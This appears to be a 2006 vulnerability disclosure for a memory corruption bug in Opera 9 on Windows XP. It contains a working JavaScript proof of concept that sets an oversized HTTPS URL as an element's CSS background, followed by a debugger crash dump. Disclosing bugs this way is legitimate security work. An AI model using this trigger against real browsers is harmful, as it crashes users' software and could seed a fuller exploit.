The following bug was tested on the latest version of Opera 9 on a fully-patched Windows XP SP2 system. A memory corruption issue can be triggered by setting the background property of any DHTML element to a long HTTPS URL.
var a = document.createElement('a');
var b = 'XXXX';
// double the string until it is longer than 1 MiB
while (b.length <= 1024*1024) b+=b;
// assign the oversized https:// URL as the element's CSS background
a.style.background = 'url(https://' + b + ')';
Demonstration
eax=0c4f0020 ebx=00000000 ecx=0c4f0020
edx=0a4b0030 esi=00953ff8 edi=00200008
eip=67befb98 esp=0012e38c ebp=0012e404
Opera_679e0000+0x20fb98:
67befb98 668b32 mov si,[edx] ds:0023:0a4b0030=0000
This bug will be added to the OSVDB:
Opera CSS Background Property HTTPS Memory Corruption
Wednesday, July 26, 2006